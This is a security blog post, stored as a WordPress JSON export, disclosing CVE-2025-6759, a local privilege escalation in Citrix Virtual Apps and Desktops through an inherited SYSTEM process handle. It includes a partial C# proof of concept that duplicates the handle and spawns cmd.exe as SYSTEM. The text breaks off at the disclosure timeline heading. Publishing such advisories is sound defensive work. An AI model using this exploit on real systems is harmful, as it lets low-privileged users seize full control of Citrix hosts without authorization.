{"id":3485,"date":"2025-07-15T05:34:44","date_gmt":"2025-07-15T03:34:44","guid":{"rendered":"https:\/\/certitude.consulting\/blog\/?p=3485"},"modified":"2025-07-15T05:37:47","modified_gmt":"2025-07-15T03:37:47","slug":"local-privilege-escalation-citrix-virtual-apps-and-desktops","status":"publish","type":"post","link":"https:\/\/certitude.consulting\/blog\/en\/local-privilege-escalation-citrix-virtual-apps-and-desktops\/","title":{"rendered":"CVE-2025-6759: Local Privilege Escalation in Citrix Virtual Apps and Desktops"},"content":{"rendered":"\n

Certitude identified a local privilege escalation vulnerability in Citrix Virtual Apps and Desktops which would allow an attacker with control of a low-privileged user within a virtual desktop to reliably escalate privileges to SYSTEM<\/code>. We informed Citrix of the finding, who were already made aware of the issue two months prior. A patch and security bulletin1<\/sup> was recently released.<\/p>\n\n\n\n

Discovery<\/strong><\/p>\n\n\n\n

During a network penetration test, while logged into a virtual desktop, we noticed a Citrix process called CtxGfx.exe<\/code> running in the context of our user (see Figure 1). This process seemed to have inherited a PROCESS_ALL_ACCESS<\/code> handle to its parent process GfxMgr.exe<\/code> (see Figure 2), which was running as SYSTEM<\/code>. Due to these circumstances, it was possible to execute arbitrary code as SYSTEM<\/code> by duplicating the process handle and using it to create a \u201cchild\u201d process.<\/p>\n\n\n\n

\"\"
Figure 1: Our current user is the owner of the CtxGfx.exe process<\/em><\/figcaption><\/figure>\n\n\n\n
\"\"
Figure 2: The CtxGfx.exe<\/code> process has a handle to GfxMgr.exe<\/code> with PROCESS_ALL_ACCESS<\/code><\/em><\/figcaption><\/figure>\n\n\n\n

Exploitation<\/strong><\/p>\n\n\n\n

To exploit this circumstance, we developed a custom C# program which uses Windows API functions to:<\/p>\n\n\n\n

    \n
  1. Open a handle to CtxGfx.exe<\/code> (OpenProcess<\/code>3<\/sup>)<\/li>\n\n\n\n
  2. Duplicate the handle CtxGfx.exe<\/code> has for GfxMgr.exe<\/code> (DuplicateHandle<\/code>4<\/sup>)<\/li>\n\n\n\n
  3. Create a cmd.exe<\/code> process using the duplicated handle to set GfxMgr.exe<\/code> as the parent process (CreateProcess<\/code>5<\/sup>)<\/li>\n<\/ol>\n\n\n\n

    The partial code is listed below. Notably, a specific STARTUPINFO<\/code>6<\/sup> struct must be prepared which sets the parent process of the cmd.exe<\/code> process (PROC_THREAD_ATTRIBUTE_PARENT_PROCESS<\/code>7<\/sup>) to the GfxMgr.exe<\/code> process which is running as SYSTEM<\/code>.<\/p>\n\n\n\n

    using System;\nusing System.Runtime.InteropServices;\n\nnamespace UpperHandle\n{\n    internal class Program\n    {\n        ...SNIP...<\/em>\n\n        static void Main(string[] args)\n        {\n            ...SNIP...<\/em>\n\n            IntPtr hMediumProcess = OpenProcess(ProcessAccessFlags.DuplicateHandle, false, uint.Parse(args[0]))<\/mark>;\n            IntPtr dupHandle;\n            if (!DuplicateHandle(hMediumProcess, (IntPtr)uint.Parse(args[1]), GetCurrentProcess(), out dupHandle, 0x001F0000, false, 0x00000002)<\/mark>)\n            {\n                Console.WriteLine(\"[-] ERROR: DuplicateHandle -- \" + Marshal.GetLastWin32Error());\n                return;\n            }\n\n            STARTUPINFOEX si = new STARTUPINFOEX();\n            si.StartupInfo.cb = Marshal.SizeOf(typeof(STARTUPINFOEX));\n            PROCESS_INFORMATION pi = new PROCESS_INFORMATION();\n\n            IntPtr size = IntPtr.Zero;\n            InitializeProcThreadAttributeList(IntPtr.Zero, 1, 0, ref size);\n            si.lpAttributeList = HeapAlloc(GetProcessHeap(), 0, (UIntPtr)size.ToInt32());\n            InitializeProcThreadAttributeList(si.lpAttributeList, 1, 0, ref size);\n\n            IntPtr attribute = new IntPtr(0x00020000); \/\/ PROC_THREAD_ATTRIBUTE_PARENT_PROCESS\n            IntPtr dupHandlePtr = Marshal.AllocHGlobal(IntPtr.Size);\n            Marshal.WriteIntPtr(dupHandlePtr, dupHandle);\n            if (!UpdateProcThreadAttribute(si.lpAttributeList, 0, attribute, dupHandlePtr, (IntPtr)IntPtr.Size, IntPtr.Zero, IntPtr.Zero)<\/mark>)\n            {\n                Console.WriteLine(\"[-] ERROR: UpdateProcThreadAttribute -- \" + Marshal.GetLastWin32Error());\n                return;\n            }\n\n            bool success = CreateProcess(\n                null,\n                \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n                IntPtr.Zero,\n                IntPtr.Zero,\n                true,\n                0x00080000 | 0x00000010, \/\/ EXTENDED_STARTUPINFO_PRESENT | CREATE_NEW_CONSOLE\n                IntPtr.Zero,\n                null,\n                ref si,\n                out pi\n            )<\/mark>;\n        }\n    }\n}<\/code><\/pre>\n\n\n\n
    Figure 3 demonstrates successful exploitation. The first argument is the process ID of CtxGfx.exe<\/code>, and the second argument is the handle ID for GfxMgr.exe<\/code>, both decimal values (0x198 = 408).<\/p>\n\n\n\n
    \"\"
    Figure 3: Using our custom POC program to spawn a cmd.exe<\/code> process as SYSTEM<\/code><\/em><\/figcaption><\/figure>\n\n\n\n
    Disclosure timeline<\/strong><\/p>\n\n\n\n